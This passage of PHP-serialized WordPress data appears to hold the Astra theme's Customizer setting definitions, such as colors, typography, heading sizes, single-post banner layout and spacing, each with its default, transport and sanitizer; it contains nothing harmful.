;i:8;s:7:"#000000";}s:9:"palette_3";a:9:{i:0;s:7:"#0170B9";i:1;s:7:"#3a3a3a";i:2;s:7:"#3a3a3a";i:3;s:7:"#4B4F58";i:4;s:7:"#F5F5F5";i:5;s:7:"#FFFFFF";i:6;s:7:"#F2F5F7";i:7;s:7:"#424242";i:8;s:7:"#000000";}}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[theme-color-divider-reset]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:27:"astra-settings[theme-color]";a:4:{s:7:"default";s:25:"var(--ast-global-color-0)";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[base-link-colors-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:26:"astra-settings[link-color]";a:4:{s:7:"default";s:25:"var(--ast-global-color-0)";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:28:"astra-settings[link-h-color]";a:4:{s:7:"default";s:25:"var(--ast-global-color-1)";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:26:"astra-settings[text-color]";a:4:{s:7:"default";s:25:"var(--ast-global-color-3)";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:28:"astra-settings[border-color]";a:4:{s:7:"default";s:25:"var(--ast-global-color-6)";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[ast-blog-pro-items]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[font-size-page-title]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:26;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[ast-body-font-settings-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[ast-body-font-settings]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:32:"astra-settings[body-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:33:"astra-settings[body-font-variant]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:21:"sanitize_font_variant";}}s:32:"astra-settings[body-font-weight]";a:4:{s:7:"default";s:3:"400";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:30:"astra-settings[font-size-body]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:16;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:32:"astra-settings[body-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:3:"1.6";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[ast-headings-font-settings]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[ast-headings-font-settings-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[headings-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:36:"astra-settings[headings-font-weight]";a:4:{s:7:"default";s:3:"600";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:37:"astra-settings[headings-font-variant]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:21:"sanitize_font_variant";}}s:36:"astra-settings[headings-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[para-margin-bottom]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[underline-content-links]";a:4:{s:7:"default";b:1;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[ast-heading-h1-typo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[ast-heading-h2-typo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[ast-heading-h3-typo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[ast-heading-h4-typo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[ast-heading-h5-typo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[ast-heading-h6-typo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:28:"astra-settings[wp-blocks-ui]";a:4:{s:7:"default";s:7:"comfort";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[wp-blocks-global-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"em";s:11:"tablet-unit";s:2:"em";s:11:"mobile-unit";s:2:"em";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:40:"astra-settings[wp-blocks-ui-description]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";s:0:"";}s:30:"astra-settings[font-family-h1]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:30:"astra-settings[font-weight-h1]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:28:"astra-settings[font-size-h1]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:40;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[font-extras-h1]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:3:"1.4";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[font-family-h2]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:30:"astra-settings[font-weight-h2]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:28:"astra-settings[font-size-h2]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:32;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[font-extras-h2]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:4:"1.25";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[font-family-h3]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:30:"astra-settings[font-weight-h3]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:28:"astra-settings[font-size-h3]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:26;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[font-extras-h3]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:3:"1.2";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[font-family-h4]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:30:"astra-settings[font-weight-h4]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:28:"astra-settings[font-size-h4]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:24;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[font-extras-h4]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:3:"1.2";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[font-family-h5]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:30:"astra-settings[font-weight-h5]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:28:"astra-settings[font-size-h5]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:20;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[font-extras-h5]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:3:"1.2";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[font-family-h6]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:30:"astra-settings[font-weight-h6]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:28:"astra-settings[font-size-h6]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:16;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[font-extras-h6]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:4:"1.25";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[font-size-site-title]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:26;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[font-size-site-tagline]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:15;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[ast-single-post-items]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:24:"astra-typography-presets";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[enable-scroll-to-id]";a:4:{s:7:"default";b:1;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[site-accessibility-toggle]";a:4:{s:7:"default";b:1;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[site-accessibility-highlight-type]";a:4:{s:7:"default";s:6:"dotted";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[site-accessibility-highlight-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:55:"astra-settings[site-accessibility-highlight-input-type]";a:4:{s:7:"default";s:7:"disable";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[site-accessibility-highlight-input-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[astra-pro-section-notice]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[single-post-content-layout]";a:4:{s:7:"default";s:7:"default";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[single-post-sidebar-layout]";a:4:{s:7:"default";s:7:"default";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"ast-dynamic-single-post-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[ast-single-post-title]";a:4:{s:7:"default";b:1;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[ast-dynamic-single-post-layout]";a:4:{s:7:"default";s:8:"layout-1";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-single-post-banner-width-type]";a:4:{s:7:"default";s:9:"fullwidth";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:59:"astra-settings[ast-dynamic-single-post-banner-custom-width]";a:4:{s:7:"default";i:1200;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[ast-dynamic-single-post-structure]";a:4:{s:7:"default";a:2:{i:0;s:29:"ast-dynamic-single-post-title";i:1;s:28:"ast-dynamic-single-post-meta";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:62:"astra-settings[ast-dynamic-single-post-featured-as-background]";a:4:{s:7:"default";b:0;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:63:"astra-settings[ast-dynamic-single-post-banner-featured-overlay]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[ast-dynamic-single-post-featured-help-notice]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:62:"astra-settings[ast-dynamic-single-post-taxonomy-clone-tracker]";a:4:{s:7:"default";i:1;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[ast-dynamic-single-post-metadata]";a:4:{s:7:"default";a:3:{i:0;s:8:"comments";i:1;s:6:"author";i:2;s:4:"date";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[ast-dynamic-single-post-meta-date-type]";a:4:{s:7:"default";s:9:"published";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[ast-dynamic-single-post-date-format]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[ast-dynamic-single-post-horizontal-alignment]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:58:"astra-settings[ast-dynamic-single-post-vertical-alignment]";a:4:{s:7:"default";s:6:"center";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[ast-dynamic-single-post-banner-height]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[ast-dynamic-single-post-elements-gap]";a:4:{s:7:"default";i:10;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-single-post-banner-background]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:11:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";}s:6:"tablet";a:11:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";}s:6:"mobile";a:11:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:58:"astra-settings[ast-dynamic-single-post-banner-title-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-single-post-banner-text-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-single-post-banner-link-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:63:"astra-settings[ast-dynamic-single-post-banner-link-hover-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:69:"astra-settings[ast-dynamic-single-post-banner-title-typography-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:68:"astra-settings[ast-dynamic-single-post-banner-text-typography-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[ast-dynamic-single-post-text-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:56:"astra-settings[ast-dynamic-single-post-text-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:54:"astra-settings[ast-dynamic-single-post-text-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[ast-dynamic-single-post-text-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-single-post-title-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:57:"astra-settings[ast-dynamic-single-post-title-font-weight]";a:4:{s:7:"default";s:3:"600";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:55:"astra-settings[ast-dynamic-single-post-title-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:2:"32";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[ast-dynamic-single-post-title-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:68:"astra-settings[ast-dynamic-single-post-banner-meta-typography-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[ast-dynamic-single-post-meta-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:56:"astra-settings[ast-dynamic-single-post-meta-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:54:"astra-settings[ast-dynamic-single-post-meta-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[ast-dynamic-single-post-meta-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[ast-dynamic-single-post-banner-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:54:"astra-settings[ast-dynamic-single-post-banner-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";i:3;s:5:"right";i:3;s:6:"bottom";i:3;s:4:"left";i:3;}s:6:"tablet";a:4:{s:3:"top";s:0:"